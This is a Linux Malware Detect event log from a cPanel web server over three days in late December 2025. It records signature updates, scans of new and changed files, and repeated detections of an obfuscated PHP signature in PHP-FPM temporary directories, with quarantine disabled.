Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc190b65a8.php
Dec 28 2025 04:14:21 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc31cd4a9b.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc4692e978.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc48341ffd.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc14225594.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695025e243c33.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff108c5967.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f339a64.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950237c0ef6e.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273466a9b.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f50f90b.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc49d4cbb2.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc0bf7219b.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e2b3f3a.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e81667a.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950274bb321c.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0ab7bf38.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502748d0aa7.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950273670c21.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc1695cecc.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0b232901.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0a068b38.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc2fdac747.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff09746573.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695027432653c.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f71c1ad.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0e4a51e8.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff08dc0316.php
Dec 28 2025 04:14:22 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff106c40f9.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0f81ebdc.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026f9dfd9c.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc340a0702.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502745620bf.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0ae415ac.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc0ec3b331.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_6950274707e8e.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694fc11862c85.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502482d1b02.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026d603917.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695025749d433.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_69502731ac4b7.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026efbf958.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff08a8288b.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026d91fc03.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0fb271d8.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_695026dd8eda6.php
Dec 28 2025 04:14:23 web1 maldet(251837): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef3ea8c4bc9943f2a65d4009b9d9d016-ea-php83-php-fpm.service-olWZdn/tmp/run_694ff0f57cab5.php
Dec 28 2025 04:14:23 web1 maldet(251837): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 782, malware hits 120, cleaned hits 0, time 54s
Dec 28 2025 04:14:23 web1 maldet(251837): {scan} scan report saved, to view run: maldet --report 251228-0413.251837
Dec 28 2025 04:14:23 web1 maldet(251837): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 251228-0413.251837
Dec 28 2025 04:58:43 web1 maldet(1155): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Dec 28 2025 16:02:33 web1 maldet(1159): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Dec 28 2025 22:28:29 web1 maldet(1157): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Dec 29 2025 04:42:11 web1 maldet(108678): {update} checking for available updates...
Dec 29 2025 04:42:11 web1 maldet(108678): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Dec 29 2025 04:42:11 web1 maldet(108678): {update} hashing install files and checking against server...
Dec 29 2025 04:42:12 web1 maldet(108678): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Dec 29 2025 04:42:12 web1 maldet(108678): {update} latest version already installed.
Dec 29 2025 04:42:12 web1 maldet(108787): {sigup} performing signature update check...
Dec 29 2025 04:42:12 web1 maldet(108787): {sigup} local signature set is version 202512281244183
Dec 29 2025 04:42:12 web1 maldet(108787): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 29 2025 04:42:12 web1 maldet(108787): {sigup} latest signature set already installed
Dec 29 2025 04:42:12 web1 maldet(108877): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Dec 29 2025 04:42:12 web1 maldet(108877): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 29 2025 04:42:12 web1 maldet(108877): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Dec 29 2025 04:42:12 web1 maldet(108877): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Dec 29 2025 04:42:12 web1 maldet(108877): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Dec 29 2025 04:42:40 web1 maldet(108877): {scan} file list completed in 28s, found 631 files...
Dec 29 2025 04:42:40 web1 maldet(108877): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Dec 29 2025 04:42:40 web1 maldet(108877): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (631 files) in progress...
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef17c449f5bd44a29b8d558e645e5282-ea-php83-php-fpm.service-N89uFz/tmp/run_6951b03fc40d8.php
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-ef17c449f5bd44a29b8d558e645e5282-ea-php83-php-fpm.service-N89uFz/tmp/run_6951afc6e4cf9.php
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_695214ee8838a.php
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_695211ad05acb.php
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_695151a9751af.php
Dec 29 2025 04:42:55 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514c4fe403a.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514f58f31f6.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_6951514d1c1c6.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514e76a8663.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514eebe7626.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef17c449f5bd44a29b8d558e645e5282-ea-php83-php-fpm.service-N89uFz/tmp/run_6951b03fc40d8.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-ef17c449f5bd44a29b8d558e645e5282-ea-php83-php-fpm.service-N89uFz/tmp/run_6951afc6e4cf9.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_695214ee8838a.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_695211ad05acb.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_695151a9751af.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514c4fe403a.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514f58f31f6.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_6951514d1c1c6.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514e76a8663.php
Dec 29 2025 04:42:56 web1 maldet(108877): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b7dcb900204c42c8afe432a263e64cdc-ea-php83-php-fpm.service-LxZTWm/tmp/run_69514eebe7626.php
Dec 29 2025 04:42:56 web1 maldet(108877): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 631, malware hits 20, cleaned hits 0, time 44s
Dec 29 2025 04:42:56 web1 maldet(108877): {scan} scan report saved, to view run: maldet --report 251229-0442.108877
Dec 29 2025 04:42:56 web1 maldet(108877): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 251229-0442.108877
Dec 29 2025 20:07:44 web1 maldet(1165): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Dec 30 2025 04:08:38 web1 maldet(122304): {update} checking for available updates...
Dec 30 2025 04:08:39 web1 maldet(122304): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Dec 30 2025 04:08:39 web1 maldet(122304): {update} hashing install files and checking against server...
Dec 30 2025 04:08:39 web1 maldet(122304): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Dec 30 2025 04:08:39 web1 maldet(122304): {update} latest version already installed.
Dec 30 2025 04:08:39 web1 maldet(122414): {sigup} performing signature update check...
Dec 30 2025 04:08:39 web1 maldet(122414): {sigup} local signature set is version 202512281244183
Dec 30 2025 04:08:39 web1 maldet(122414): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Dec 30 2025 04:08:39 web1 maldet(122414): {sigup} latest signature set already installed
Dec 30 2025 04:08:39 web1 maldet(122513): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Dec 30 2025 04:08:39 web1 maldet(122513): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Dec 30 2025 04:08:39 web1 maldet(122513): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Dec 30 2025 04:08:39 web1 maldet(122513): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Dec 30 2025 04:08:39 web1 maldet(122513): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Dec 30 2025 04:09:06 web1 maldet(122513): {scan} file list completed in 27s, found 891 files...
Dec 30 2025 04:09:06 web1 maldet(122513): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Dec 30 2025 04:09:06 web1 maldet(122513): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (891 files) in progress...
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952d8a770635.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952745412d62.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952d6e260e6b.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533a19a0c20.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539bafc18bd.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539ee2ccbc7.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533bff1090c.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539c19c5bea.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695338a65be86.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539fb6205c1.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539b462e0d1.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695338488414c.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539adb69af9.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539ffb0ca7f.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533bb776f2f.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539e96a5fdb.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952d8a770635.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952745412d62.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-2249221eb79f42838530018ffd3a1fb8-ea-php83-php-fpm.service-J1oZCo/tmp/run_6952d6e260e6b.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533a19a0c20.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539bafc18bd.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539ee2ccbc7.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69533bff1090c.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539c19c5bea.php
Dec 30 2025 04:09:27 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695338a65be86.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539fb6205c1.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539b462e0d1.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_695338488414c.php
Dec 30 2025 04:09:28 web1 maldet(122513): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-8f2e02de04204f5d900c5dab90b5ddf3-ea-php83-php-fpm.service-KNGDgI/tmp/run_69539adb69af9.php
